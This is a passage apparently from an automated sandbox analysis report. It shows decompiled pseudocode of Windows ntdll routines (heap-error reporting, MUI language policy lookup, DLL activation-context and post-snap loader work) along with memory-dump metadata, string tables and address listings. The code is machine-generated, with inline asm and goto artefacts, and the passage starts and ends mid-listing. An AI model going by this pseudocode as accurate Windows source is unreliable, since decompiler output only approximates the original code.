                                                    					}
                                                    					_push( *0x4c358b4);
                                                    					E04B4B150("Last known valid blocks: before - %p, after - %p\n",  *0x4c358b0);
                                                    				} else {
                                                    					_t120 =  *0x4c358b4; // 0x0
                                                    					if(_t120 != 0) {
                                                    						goto L41;
                                                    					}
                                                    				}
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    					_push(_t104);
                                                    					E04B4B150();
                                                    				} else {
                                                    					E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    				}
                                                    				return E04B4B150("Stack trace available at %p\n", 0x4c358c0);
                                                    			}












                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 47e7f3fabdd352f049be2ba7a34102dadabfa1e34feade141c6730438725e510
                                                    • Instruction ID: 176a7889e6554ce5a9a817a1d3d693b6e694aa7c0300dd95a441c5d249206c57
                                                    • Opcode Fuzzy Hash: 47e7f3fabdd352f049be2ba7a34102dadabfa1e34feade141c6730438725e510
                                                    • Instruction Fuzzy Hash: E961F537664251EFE7019B96D485E24B3A6EB04B32B0DC0EAF50D5B390DA36FC50DE0A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 96%
                                                    			E04B53D34(signed int* __ecx) {
                                                    				signed int* _v8;
                                                    				char _v12;
                                                    				signed int* _v16;
                                                    				signed int* _v20;
                                                    				char _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				char _v36;
                                                    				signed int _v40;
                                                    				signed int _v44;
                                                    				signed int* _v48;
                                                    				signed int* _v52;
                                                    				signed int _v56;
                                                    				signed int _v60;
                                                    				char _v68;
                                                    				signed int _t140;
                                                    				signed int _t161;
                                                    				signed int* _t236;
                                                    				signed int* _t242;
                                                    				signed int* _t243;
                                                    				signed int* _t244;
                                                    				signed int* _t245;
                                                    				signed int _t255;
                                                    				void* _t257;
                                                    				signed int _t260;
                                                    				void* _t262;
                                                    				signed int _t264;
                                                    				void* _t267;
                                                    				signed int _t275;
                                                    				signed int* _t276;
                                                    				short* _t277;
                                                    				signed int* _t278;
                                                    				signed int* _t279;
                                                    				signed int* _t280;
                                                    				short* _t281;
                                                    				signed int* _t282;
                                                    				short* _t283;
                                                    				signed int* _t284;
                                                    				void* _t285;
                                                    
                                                    				_v60 = _v60 | 0xffffffff;
                                                    				_t280 = 0;
                                                    				_t242 = __ecx;
                                                    				_v52 = __ecx;
                                                    				_v8 = 0;
                                                    				_v20 = 0;
                                                    				_v40 = 0;
                                                    				_v28 = 0;
                                                    				_v32 = 0;
                                                    				_v44 = 0;
                                                    				_v56 = 0;
                                                    				_t275 = 0;
                                                    				_v16 = 0;
                                                    				if(__ecx == 0) {
                                                    					_t280 = 0xc000000d;
                                                    					_t140 = 0;
                                                    					L50:
                                                    					 *_t242 =  *_t242 | 0x00000800;
                                                    					_t242[0x13] = _t140;
                                                    					_t242[0x16] = _v40;
                                                    					_t242[0x18] = _v28;
                                                    					_t242[0x14] = _v32;
                                                    					_t242[0x17] = _t275;
                                                    					_t242[0x15] = _v44;
                                                    					_t242[0x11] = _v56;
                                                    					_t242[0x12] = _v60;
                                                    					return _t280;
                                                    				}
                                                    				if(E04B51B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                    					_v56 = 1;
                                                    					if(_v8 != 0) {
                                                    						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                    					}
                                                    					_v8 = _t280;
                                                    				}
                                                    				if(E04B51B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                    					_v60 =  *_v8;
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                    					_v8 = _t280;
                                                    				}
                                                    				if(E04B51B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                    					L16:
                                                    					if(E04B51B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                    						L28:
                                                    						if(E04B51B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                    							L46:
                                                    							_t275 = _v16;
                                                    							L47:
                                                    							_t161 = 0;
                                                    							L48:
                                                    							if(_v8 != 0) {
                                                    								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                    							}
                                                    							_t140 = _v20;
                                                    							if(_t140 != 0) {
                                                    								if(_t275 != 0) {
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                    									_t275 = 0;
                                                    									_v28 = 0;
                                                    									_t140 = _v20;
                                                    								}
                                                    							}
                                                    							goto L50;
                                                    						}
                                                    						_t167 = _v12;
                                                    						_t255 = _v12 + 4;
                                                    						_v44 = _t255;
                                                    						if(_t255 == 0) {
                                                    							_t276 = _t280;
                                                    							_v32 = _t280;
                                                    						} else {
                                                    							_t276 = L04B64620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                    							_t167 = _v12;
                                                    							_v32 = _t276;
                                                    						}
                                                    						if(_t276 == 0) {
                                                    							_v44 = _t280;
                                                    							_t280 = 0xc0000017;
                                                    							goto L46;
                                                    						} else {
                                                    							E04B8F3E0(_t276, _v8, _t167);
                                                    							_v48 = _t276;
                                                    							_t277 = E04B91370(_t276, 0x4b24e90);
                                                    							_pop(_t257);
                                                    							if(_t277 == 0) {
                                                    								L38:
                                                    								_t170 = _v48;
                                                    								if( *_v48 != 0) {
                                                    									E04B8BB40(0,  &_v68, _t170);
                                                    									if(L04B543C0( &_v68,  &_v24) != 0) {
                                                    										_t280 =  &(_t280[0]);
                                                    									}
                                                    								}
                                                    								if(_t280 == 0) {
                                                    									_t280 = 0;
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                    									_v44 = 0;
                                                    									_v32 = 0;
                                                    								} else {
                                                    									_t280 = 0;
                                                    								}
                                                    								_t174 = _v8;
                                                    								if(_v8 != 0) {
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                    								}
                                                    								_v8 = _t280;
                                                    								goto L46;
                                                    							}
                                                    							_t243 = _v48;
                                                    							do {
                                                    								 *_t277 = 0;
                                                    								_t278 = _t277 + 2;
                                                    								E04B8BB40(_t257,  &_v68, _t243);
                                                    								if(L04B543C0( &_v68,  &_v24) != 0) {
                                                    									_t280 =  &(_t280[0]);
                                                    								}
                                                    								_t243 = _t278;
                                                    								_t277 = E04B91370(_t278, 0x4b24e90);
                                                    								_pop(_t257);
                                                    							} while (_t277 != 0);
                                                    							_v48 = _t243;
                                                    							_t242 = _v52;
                                                    							goto L38;
                                                    						}
                                                    					}
                                                    					_t191 = _v12;
                                                    					_t260 = _v12 + 4;
                                                    					_v28 = _t260;
                                                    					if(_t260 == 0) {
                                                    						_t275 = _t280;
                                                    						_v16 = _t280;
                                                    					} else {
                                                    						_t275 = L04B64620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                    						_t191 = _v12;
                                                    						_v16 = _t275;
                                                    					}
                                                    					if(_t275 == 0) {
                                                    						_v28 = _t280;
                                                    						_t280 = 0xc0000017;
                                                    						goto L47;
                                                    					} else {
                                                    						E04B8F3E0(_t275, _v8, _t191);
                                                    						_t285 = _t285 + 0xc;
                                                    						_v48 = _t275;
                                                    						_t279 = _t280;
                                                    						_t281 = E04B91370(_v16, 0x4b24e90);
                                                    						_pop(_t262);
                                                    						if(_t281 != 0) {
                                                    							_t244 = _v48;
                                                    							do {
                                                    								 *_t281 = 0;
                                                    								_t282 = _t281 + 2;
                                                    								E04B8BB40(_t262,  &_v68, _t244);
                                                    								if(L04B543C0( &_v68,  &_v24) != 0) {
                                                    									_t279 =  &(_t279[0]);
                                                    								}
                                                    								_t244 = _t282;
                                                    								_t281 = E04B91370(_t282, 0x4b24e90);
                                                    								_pop(_t262);
                                                    							} while (_t281 != 0);
                                                    							_v48 = _t244;
                                                    							_t242 = _v52;
                                                    						}
                                                    						_t201 = _v48;
                                                    						_t280 = 0;
                                                    						if( *_v48 != 0) {
                                                    							E04B8BB40(_t262,  &_v68, _t201);
                                                    							if(L04B543C0( &_v68,  &_v24) != 0) {
                                                    								_t279 =  &(_t279[0]);
                                                    							}
                                                    						}
                                                    						if(_t279 == 0) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                    							_v28 = _t280;
                                                    							_v16 = _t280;
                                                    						}
                                                    						_t202 = _v8;
                                                    						if(_v8 != 0) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                    						}
                                                    						_v8 = _t280;
                                                    						goto L28;
                                                    					}
                                                    				}
                                                    				_t214 = _v12;
                                                    				_t264 = _v12 + 4;
                                                    				_v40 = _t264;
                                                    				if(_t264 == 0) {
                                                    					_v20 = _t280;
                                                    				} else {
                                                    					_t236 = L04B64620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                    					_t280 = _t236;
                                                    					_v20 = _t236;
                                                    					_t214 = _v12;
                                                    				}
                                                    				if(_t280 == 0) {
                                                    					_t161 = 0;
                                                    					_t280 = 0xc0000017;
                                                    					_v40 = 0;
                                                    					goto L48;
                                                    				} else {
                                                    					E04B8F3E0(_t280, _v8, _t214);
                                                    					_t285 = _t285 + 0xc;
                                                    					_v48 = _t280;
                                                    					_t283 = E04B91370(_t280, 0x4b24e90);
                                                    					_pop(_t267);
                                                    					if(_t283 != 0) {
                                                    						_t245 = _v48;
                                                    						do {
                                                    							 *_t283 = 0;
                                                    							_t284 = _t283 + 2;
                                                    							E04B8BB40(_t267,  &_v68, _t245);
                                                    							if(L04B543C0( &_v68,  &_v24) != 0) {
                                                    								_t275 = _t275 + 1;
                                                    							}
                                                    							_t245 = _t284;
                                                    							_t283 = E04B91370(_t284, 0x4b24e90);
                                                    							_pop(_t267);
                                                    						} while (_t283 != 0);
                                                    						_v48 = _t245;
                                                    						_t242 = _v52;
                                                    					}
                                                    					_t224 = _v48;
                                                    					_t280 = 0;
                                                    					if( *_v48 != 0) {
                                                    						E04B8BB40(_t267,  &_v68, _t224);
                                                    						if(L04B543C0( &_v68,  &_v24) != 0) {
                                                    							_t275 = _t275 + 1;
                                                    						}
                                                    					}
                                                    					if(_t275 == 0) {
                                                    						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                    						_v40 = _t280;
                                                    						_v20 = _t280;
                                                    					}
                                                    					_t225 = _v8;
                                                    					if(_v8 != 0) {
                                                    						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                    					}
                                                    					_v8 = _t280;
                                                    					goto L16;
                                                    				}
                                                    			}


                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 04B53D8C
                                                    • WindowsExcludedProcs, xrefs: 04B53D6F
                                                    • Kernel-MUI-Language-SKU, xrefs: 04B53F70
                                                    • Kernel-MUI-Language-Allowed, xrefs: 04B53DC0
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 04B53E97
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: b6a58f3d18a348b75be60ff345d2014638c3ac57070d5ef021fa46268f68e158
                                                    • Instruction ID: 3652308b59f2d691bdb6c87c4a6db20c7ffd8f289e56612ab4d9290a929c06ea
                                                    • Opcode Fuzzy Hash: b6a58f3d18a348b75be60ff345d2014638c3ac57070d5ef021fa46268f68e158
                                                    • Instruction Fuzzy Hash: E4F12E72D04619EFDF15DF98C940AEEB7F9FF48654F1400AAE905A7620E734AE41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 44%
                                                    			E04B78E00(void* __ecx) {
                                                    				signed int _v8;
                                                    				char _v12;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr* _t32;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t43;
                                                    				void* _t46;
                                                    				intOrPtr _t47;
                                                    				void* _t48;
                                                    				signed int _t49;
                                                    				void* _t50;
                                                    				intOrPtr* _t51;
                                                    				signed int _t52;
                                                    				void* _t53;
                                                    				intOrPtr _t55;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t52;
                                                    				_t49 = 0;
                                                    				_t48 = __ecx;
                                                    				_t55 =  *0x4c38464; // 0x74790110
                                                    				if(_t55 == 0) {
                                                    					L9:
                                                    					if( !_t49 >= 0) {
                                                    						if(( *0x4c35780 & 0x00000003) != 0) {
                                                    							E04BC5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                    						}
                                                    						if(( *0x4c35780 & 0x00000010) != 0) {
                                                    							asm("int3");
                                                    						}
                                                    					}
                                                    					return E04B8B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                    				}
                                                    				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                    				_t43 =  *0x4c37984; // 0xc93e68
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                    					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                    					if(_t48 == _t43) {
                                                    						_t50 = 0x5c;
                                                    						if( *_t32 == _t50) {
                                                    							_t46 = 0x3f;
                                                    							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                    								_t32 = _t32 + 8;
                                                    							}
                                                    						}
                                                    					}
                                                    					_t51 =  *0x4c38464; // 0x74790110
                                                    					 *0x4c3b1e0(_t47, _t32,  &_v12);
                                                    					_t49 =  *_t51();
                                                    					if(_t49 >= 0) {
                                                    						L8:
                                                    						_t35 = _v12;
                                                    						if(_t35 != 0) {
                                                    							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                    								E04B79B10( *((intOrPtr*)(_t48 + 0x48)));
                                                    								_t35 = _v12;
                                                    							}
                                                    							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                    						}
                                                    						goto L9;
                                                    					}
                                                    					if(_t49 != 0xc000008a) {
                                                    						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                    							if(_t49 != 0xc00000bb) {
                                                    								goto L8;
                                                    							}
                                                    						}
                                                    					}
                                                    					if(( *0x4c35780 & 0x00000005) != 0) {
                                                    						_push(_t49);
                                                    						E04BC5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                    						_t53 = _t53 + 0x1c;
                                                    					}
                                                    					_t49 = 0;
                                                    					goto L8;
                                                    				} else {
                                                    					goto L9;
                                                    				}
                                                    			}

                                                    Strings
                                                    • LdrpFindDllActivationContext, xrefs: 04BB9331, 04BB935D
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 04BB9357
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04BB932A
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 04BB933B, 04BB9367
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: 6c60a450d0632c78666fc04d72110d672ec40a182ba865a817c6b8a01db8030d
                                                    • Instruction ID: ffcc5bfc87fd6e73bc62511f5ed6449a1fc132d2c419b25dd67419413dfa1c8f
                                                    • Opcode Fuzzy Hash: 6c60a450d0632c78666fc04d72110d672ec40a182ba865a817c6b8a01db8030d
                                                    • Instruction Fuzzy Hash: 7041E732B00315AFDB35BE18C88DB76B2B5EB05354F0549E9E96D97160E774BD8086C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E04B58794(void* __ecx) {
                                                    				signed int _v0;
                                                    				char _v8;
                                                    				signed int _v12;
                                                    				void* _v16;
                                                    				signed int _v20;
                                                    				intOrPtr _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				signed int _v40;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr* _t77;
                                                    				signed int _t80;
                                                    				signed char _t81;
                                                    				signed int _t87;
                                                    				signed int _t91;
                                                    				void* _t92;
                                                    				void* _t94;
                                                    				signed int _t95;
                                                    				signed int _t103;
                                                    				signed int _t105;
                                                    				signed int _t110;
                                                    				signed int _t118;
                                                    				intOrPtr* _t121;
                                                    				intOrPtr _t122;
                                                    				signed int _t125;
                                                    				signed int _t129;
                                                    				signed int _t131;
                                                    				signed int _t134;
                                                    				signed int _t136;
                                                    				signed int _t143;
                                                    				signed int* _t147;
                                                    				signed int _t151;
                                                    				void* _t153;
                                                    				signed int* _t157;
                                                    				signed int _t159;
                                                    				signed int _t161;
                                                    				signed int _t166;
                                                    				signed int _t168;
                                                    
                                                    				_push(__ecx);
                                                    				_t153 = __ecx;
                                                    				_t159 = 0;
                                                    				_t121 = __ecx + 0x3c;
                                                    				if( *_t121 == 0) {
                                                    					L2:
                                                    					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                    					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                    						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                    						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                    						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                    							L6:
                                                    							if(E04B5934A() != 0) {
                                                    								_t159 = E04BCA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                    								__eflags = _t159;
                                                    								if(_t159 < 0) {
                                                    									_t81 =  *0x4c35780; // 0x0
                                                    									__eflags = _t81 & 0x00000003;
                                                    									if((_t81 & 0x00000003) != 0) {
                                                    										_push(_t159);
                                                    										E04BC5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                    										_t81 =  *0x4c35780; // 0x0
                                                    									}
                                                    									__eflags = _t81 & 0x00000010;
                                                    									if((_t81 & 0x00000010) != 0) {
                                                    										asm("int3");
                                                    									}
                                                    								}
                                                    							}
                                                    						} else {
                                                    							_t159 = E04B5849B(0, _t122, _t153, _t159, _t180);
                                                    							if(_t159 >= 0) {
                                                    								goto L6;
                                                    							}
                                                    						}
                                                    						_t80 = _t159;
                                                    						goto L8;
                                                    					} else {
                                                    						_t125 = 0x13;
                                                    						asm("int 0x29");
                                                    						_push(0);
                                                    						_push(_t159);
                                                    						_t161 = _t125;
                                                    						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                    						_t143 = 0;
                                                    						_v40 = _t161;
                                                    						_t118 = 0;
                                                    						_push(_t153);
                                                    						__eflags = _t87;
                                                    						if(_t87 != 0) {
                                                    							_t118 = _t87 + 0x5d8;
                                                    							__eflags = _t118;
                                                    							if(_t118 == 0) {
                                                    								L46:
                                                    								_t118 = 0;
                                                    							} else {
                                                    								__eflags =  *(_t118 + 0x30);
                                                    								if( *(_t118 + 0x30) == 0) {
                                                    									goto L46;
                                                    								}
                                                    							}
                                                    						}
                                                    						_v32 = 0;
                                                    						_v28 = 0;
                                                    						_v16 = 0;
                                                    						_v20 = 0;
                                                    						_v12 = 0;
                                                    						__eflags = _t118;
                                                    						if(_t118 != 0) {
                                                    							__eflags = _t161;
                                                    							if(_t161 != 0) {
                                                    								__eflags =  *(_t118 + 8);
                                                    								if( *(_t118 + 8) == 0) {
                                                    									L22:
                                                    									_t143 = 1;
                                                    									__eflags = 1;
                                                    								} else {
                                                    									_t19 = _t118 + 0x40; // 0x40
                                                    									_t156 = _t19;
                                                    									E04B58999(_t19,  &_v16);
                                                    									__eflags = _v0;
                                                    									if(_v0 != 0) {
                                                    										__eflags = _v0 - 1;
                                                    										if(_v0 != 1) {
                                                    											goto L22;
                                                    										} else {
                                                    											_t128 =  *(_t161 + 0x64);
                                                    											__eflags =  *(_t161 + 0x64);
                                                    											if( *(_t161 + 0x64) == 0) {
                                                    												goto L22;
                                                    											} else {
                                                    												E04B58999(_t128,  &_v12);
                                                    												_t147 = _v12;
                                                    												_t91 = 0;
                                                    												__eflags = 0;
                                                    												_t129 =  *_t147;
                                                    												while(1) {
                                                    													__eflags =  *((intOrPtr*)(0x4c35c60 + _t91 * 8)) - _t129;
                                                    													if( *((intOrPtr*)(0x4c35c60 + _t91 * 8)) == _t129) {
                                                    														break;
                                                    													}
                                                    													_t91 = _t91 + 1;
                                                    													__eflags = _t91 - 5;
                                                    													if(_t91 < 5) {
                                                    														continue;
                                                    													} else {
                                                    														_t131 = 0;
                                                    														__eflags = 0;
                                                    													}
                                                    													L37:
                                                    													__eflags = _t131;
                                                    													if(_t131 != 0) {
                                                    														goto L22;
                                                    													} else {
                                                    														__eflags = _v16 - _t147;
                                                    														if(_v16 != _t147) {
                                                    															goto L22;
                                                    														} else {
                                                    															E04B62280(_t92, 0x4c386cc);
                                                    															_t94 = E04C19DFB( &_v20);
                                                    															__eflags = _t94 - 1;
                                                    															if(_t94 != 1) {
                                                    															}
                                                    															asm("movsd");
                                                    															asm("movsd");
                                                    															asm("movsd");
                                                    															asm("movsd");
                                                    															 *_t118 =  *_t118 + 1;
                                                    															asm("adc dword [ebx+0x4], 0x0");
                                                    															_t95 = E04B761A0( &_v32);
                                                    															__eflags = _t95;
                                                    															if(_t95 != 0) {
                                                    																__eflags = _v32 | _v28;
                                                    																if((_v32 | _v28) != 0) {
                                                    																	_t71 = _t118 + 0x40; // 0x3f
                                                    																	_t134 = _t71;
                                                    																	goto L55;
                                                    																}
                                                    															}
                                                    															goto L30;
                                                    														}
                                                    													}
                                                    													goto L56;
                                                    												}
                                                    												_t92 = 0x4c35c64 + _t91 * 8;
                                                    												asm("lock xadd [eax], ecx");
                                                    												_t131 = (_t129 | 0xffffffff) - 1;
                                                    												goto L37;
                                                    											}
                                                    										}
                                                    										goto L56;
                                                    									} else {
                                                    										_t143 = E04B58A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                    										__eflags = _t143;
                                                    										if(_t143 != 0) {
                                                    											_t157 = _v12;
                                                    											_t103 = 0;
                                                    											__eflags = 0;
                                                    											_t136 =  &(_t157[1]);
                                                    											 *(_t161 + 0x64) = _t136;
                                                    											_t151 =  *_t157;
                                                    											_v20 = _t136;
                                                    											while(1) {
                                                    												__eflags =  *((intOrPtr*)(0x4c35c60 + _t103 * 8)) - _t151;
                                                    												if( *((intOrPtr*)(0x4c35c60 + _t103 * 8)) == _t151) {
                                                    													break;
                                                    												}
                                                    												_t103 = _t103 + 1;
                                                    												__eflags = _t103 - 5;
                                                    												if(_t103 < 5) {
                                                    													continue;
                                                    												}
                                                    												L21:
                                                    												_t105 = E04B8F380(_t136, 0x4b21184, 0x10);
                                                    												__eflags = _t105;
                                                    												if(_t105 != 0) {
                                                    													__eflags =  *_t157 -  *_v16;
                                                    													if( *_t157 >=  *_v16) {
                                                    														goto L22;
                                                    													} else {
                                                    														asm("cdq");
                                                    														_t166 = _t157[5] & 0x0000ffff;
                                                    														_t108 = _t157[5] & 0x0000ffff;
                                                    														asm("cdq");
                                                    														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                    														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                    														if(__eflags > 0) {
                                                    															L29:
                                                    															E04B62280(_t108, 0x4c386cc);
                                                    															 *_t118 =  *_t118 + 1;
                                                    															_t42 = _t118 + 0x40; // 0x3f
                                                    															_t156 = _t42;
                                                    															asm("adc dword [ebx+0x4], 0x0");
                                                    															asm("movsd");
                                                    															asm("movsd");
                                                    															asm("movsd");
                                                    															asm("movsd");
                                                    															_t110 = E04B761A0( &_v32);
                                                    															__eflags = _t110;
                                                    															if(_t110 != 0) {
                                                    																__eflags = _v32 | _v28;
                                                    																if((_v32 | _v28) != 0) {
                                                    																	_t134 = _v20;
                                                    																	L55:
                                                    																	E04C19D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                    																}
                                                    															}
                                                    															L30:
                                                    															 *_t118 =  *_t118 + 1;
                                                    															asm("adc dword [ebx+0x4], 0x0");
                                                    															E04B5FFB0(_t118, _t156, 0x4c386cc);
                                                    															goto L22;
                                                    														} else {
                                                    															if(__eflags < 0) {
                                                    																goto L22;
                                                    															} else {
                                                    																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                    																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                    																	goto L22;
                                                    																} else {
                                                    																	goto L29;
                                                    																}
                                                    															}
                                                    														}
                                                    													}
                                                    													goto L56;
                                                    												}
                                                    												goto L22;
                                                    											}
                                                    											asm("lock inc dword [eax]");
                                                    											goto L21;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						return _t143;
                                                    					}
                                                    				} else {
                                                    					_push( &_v8);
                                                    					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                    					_push(__ecx + 0x40);
                                                    					_push(_t121);
                                                    					_push(0xffffffff);
                                                    					_t80 = E04B89A00();
                                                    					_t159 = _t80;
                                                    					if(_t159 < 0) {
                                                    						L8:
                                                    						return _t80;
                                                    					} else {
                                                    						goto L2;
                                                    					}
                                                    				}
                                                    				L56:
                                                    			}

                                                    0x04b5881f
                                                    0x04b58821
                                                    0x04b58822
                                                    0x04b58824
                                                    0x04b58826
                                                    0x04b5882c
                                                    0x04b5882e
                                                    0x04ba9c48
                                                    0x04ba9c48
                                                    0x04b58834
                                                    0x04b58834
                                                    0x04b58837
                                                    0x00000000
                                                    0x00000000
                                                    0x04b58837
                                                    0x04b5882e
                                                    0x04b5883d
                                                    0x04b58840
                                                    0x04b58843
                                                    0x04b58846
                                                    0x04b58849
                                                    0x04b5884c
                                                    0x04b5884e
                                                    0x04b58850
                                                    0x04b58852
                                                    0x04b58854
                                                    0x04b58857
                                                    0x04b588b4
                                                    0x04b588b6
                                                    0x04b588b6
                                                    0x04b58859
                                                    0x04b58859
                                                    0x04b58859
                                                    0x04b58861
                                                    0x04b58866
                                                    0x04b5886a
                                                    0x04b5893d
                                                    0x04b58941
                                                    0x00000000
                                                    0x04b58947
                                                    0x04b58947
                                                    0x04b5894a
                                                    0x04b5894c
                                                    0x00000000
                                                    0x04b58952
                                                    0x04b58955
                                                    0x04b5895a
                                                    0x04b5895d
                                                    0x04b5895d
                                                    0x04b5895f
                                                    0x04b58961
                                                    0x04b58961
                                                    0x04b58968
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5896a
                                                    0x04b5896b
                                                    0x04b5896e
                                                    0x00000000
                                                    0x04b58970
                                                    0x04b58970
                                                    0x04b58970
                                                    0x04b58970
                                                    0x04b58972
                                                    0x04b58972
